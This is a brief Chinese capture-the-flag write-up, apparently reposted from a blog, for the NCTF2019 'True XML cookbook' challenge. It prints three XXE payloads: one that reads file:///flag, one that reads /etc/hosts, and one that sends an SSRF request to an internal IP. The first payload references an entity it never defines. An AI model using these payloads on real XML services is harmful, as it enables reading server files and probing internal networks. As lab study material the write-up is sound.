[NCTF2019]True XML cookbook

爆破

抓包爆破，想直接爆出密码。
然鹅我天真了。

XXE漏洞

这里存在XXE漏洞，利用脚本直接打：
构造：

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
  <username>&admin;</username>
  <password>password</password>
</user>

没有哦·····

打内网

XXE漏洞可以直接攻击内网用户，先查看内网存活主机：

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///etc/hosts">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

看到了本机ip，但是不知道存活ip。
可以用BP爆破（但是看到wp上是说ip最后一位为11）：

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "http://10.34.239.11">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

[NCTF2019]True XML cookbook

原文：https://www.cnblogs.com/shenjuxian/p/13977582.html